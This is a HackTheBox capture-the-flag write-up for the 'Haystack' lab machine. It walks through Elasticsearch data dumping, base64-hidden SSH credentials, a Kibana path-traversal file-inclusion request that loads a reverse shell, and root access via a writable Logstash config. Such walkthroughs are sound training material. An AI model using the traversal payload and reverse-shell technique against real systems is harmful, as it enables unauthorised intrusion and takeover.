HackTheBox Writeup — Haystack
Hello Guys , I am Faisal Husaini. My username on HTB is “faisalelino” .
The IP of this box is 10.10.10.115
NMAP Results
nmap -sC -sV -oN nmap 10.10.10.115 -Pn
We just see an image of haystack and a needle, nothing else ! Checking the source code we see
Nothing interesting , just the image file , let’s try to fetch the image
Doing a file and binwalk command on the image file we see
It says a JPEF image data as well as TIFF image data , let’s run the strings command on it
We see a base64 encoded strings , let’s try to decode it
We get a message in Spanish , since I was born and raise in Spain , I know Spanish and this sentence means “The needle in the Haystack is ‘key’”
Now we saw in the NMAP Results that Port 9200 is open , let’s try to access it
We see that it is running elasticsearch , and from google , we learned that we can dump the data of elasticsearch using ElasticDump tool , which you have to install manually on your box.
So , we dump the data of elasticsearch using the command
elasticdump — input=http://10.10.10.115:9200 — output=data.json — type=data
So we dumped the data into a file named data.json
Let’s see what we got interesting into it
Till now details of different employees etc. Scrolling down more
We see something in quotes and all of those are in Spanish language , and there were loads and loads of quotes here , although I know spanish , still reading all these would take forever to me.
As we remember from the strings we got from the haystack picture , which told that the needle in the haystack is the “key” in spanish which was “clave” , since this is a total CTF like machine , haystack meant all these spanish quotes and needle was the “key” , i.e , “clave”
We try to grep the quotes with the word “clave”
We see two quotes , the first one translates to
This key cannot be lost, I save it here: cGFzczogc3BhbmlzaC5pcy5rZXk=
And the second quote translates to
I have to save the key for the machine: dXNlcjogc2VjdXJpdHkg
Both of them looks like a base64 encoded string , so we try to decode both of them one by one
So both of the string decodes to a username and password , let’s try to SSH using these credentials
We got in as security user through SSH
The user flag was located in the same directory in which we were spawned
Now we move on the Priv Esc part
Privelege Escalation
Check the services running on the box , we see
We see Kibana running which is related to ElasticSearch and also we didnt encountered this during our NMAP Scan
Kibana usually runs on port 5601 , if you do a google search , you will get to know that easily
Searching on Google for CVEs related to Kibana , we got something interesting
I will post the link for a detailed analysis for this at the end of this writeup , let’s try to exploit this Code Execution File Inclusion
So , we can upload our js reverse shell on the box and then call it through the Kibana api as shown below and then also put up our netcat listener
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../…/../../../path/to/shell.js
So we get ready with our curl request
Our shell looks like this
And then we put our netcat listener on
As soon as we hit our request , we get back a reverse shell
We got the reverse shell as Kibana , to confirm we use the id command
But this shell was not stable , so we went on to get a stable shell running from Linux box and we used the bash reverse shell one liner from PentestMonkey and set up another listener
And then we get our a more stable shell
Running one of the Linux Enumeration script , we get something interesting
We see /etc/logstash/conf.d is writable and when we check the permissions of that folder , we see
We see that Root and Kibana has permission for it , looking further into the folder , we get
We see three files named “filter.conf” , “input.conf” , “output.conf” , checking the contents of each files , we see
We see that input file has something which says it will execute anything in the folder /opt/kibana under the filename logstash_* in the interval of 10 seconds
The output file tells us that it will execute the command which we will provide
The filter file shows us the way of putting our command , so we are set ready for our 3rd and final reverse shell
Here , we echo our command as suggested in the filter file and put it under /opt/kibana/logstash_lul and then we put our netcat listener on and wait for few seconds and see
We got reverse shell and this time root as confirmed above , let’s get the root flag which is located usually under /root/root.txt
This was really a hard box , dont know how it was labeled as Easy and had only 20 points , should have been on Medium level